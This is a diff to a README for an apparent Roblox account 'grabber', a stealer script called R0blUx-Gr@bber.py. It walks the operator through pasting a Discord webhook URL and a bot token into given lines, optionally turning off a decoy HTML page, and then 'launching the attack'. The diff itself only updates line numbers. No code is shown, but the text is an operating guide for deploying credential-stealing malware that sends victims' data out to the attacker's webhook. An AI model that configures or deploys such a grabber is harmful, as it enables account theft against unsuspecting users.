independent-coder/Roblox-Webhooks/README.md

 <p>Now, you will need a text editor like Notepad++ or PyCharm Community Edition.</p>
 <p>If you prefer, you can use the default Notepad on your system as well.</p>
 <p>Now, open the R0blUx-Gr@bber.py file by right-clicking it and choosing "Edit" with your selected text editor.</p>
-<p>Locate line 541 and remove the preexisting text.
+<p>Locate line 641 and remove the preexisting text.
 Replace it with the webhook url that we save before if you dont have an webhook please click <a href="#webhook">here</a>  to know how to have one.</p>
-<p>Also you need to add your discord bot token stored since 2 sec if you don't know what im talking about go <a href="#bot">here</a></p>
+<p>Also you need to add your discord bot token line 637, stored since 2 sec if you don't know what im talking about go <a href="#bot">here</a></p>
 <p>Also the grabber will show an defined html page you can disable it if you want by adding some # to the line 238, 239, 240.</p>
 <p>Once you have made the necessary modifications, you can save and close the file.
 Remember, the script is open-source, so you can customize it further if needed.</p>
 <p>If you're ready to launch the attack, you have two options:</p>